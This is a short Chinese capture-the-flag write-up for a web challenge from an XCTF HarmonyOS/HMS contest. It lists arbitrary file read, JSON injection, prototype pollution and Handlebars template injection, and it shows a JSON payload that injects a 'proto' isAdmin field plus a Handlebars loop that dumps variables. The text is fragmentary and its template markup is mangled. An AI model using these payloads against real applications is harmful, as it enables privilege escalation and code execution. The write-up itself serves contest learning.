华为HCIE的第一课

发表于 2021-01-07 分类于 Challenge ， 2020 ， XCTF高校网络安全专题挑战赛， HarmonyOS和HMS专场， Web

点击此处获得更好的阅读体验

WriteUp来源

来自Venom战队发布

题目描述

一个简单的web

题目考点

任意文件读取
JSON注入
原型链污染
HandleBars模板注入

解题思路

?f=xxx任意文件读取，脱下来的源码（不过跑不起来不知道为啥，app.set报错）

","proto":{"isAdmin":1},"ip":"模版注入getshell

第一步、利用原型链污染成为admin lih3iu","proto":{"isAdmin":1},"b":"1

利用handlebars语法打印变量

{% raw %}{{{% endraw %}#each this}}
    {% raw %}{{{% endraw %}#each this}}
        {% raw %}{{{% endraw %}this.toString}}
    {% raw %}{{{% endraw %}/each}}
{% raw %}{{{% endraw %}/each}}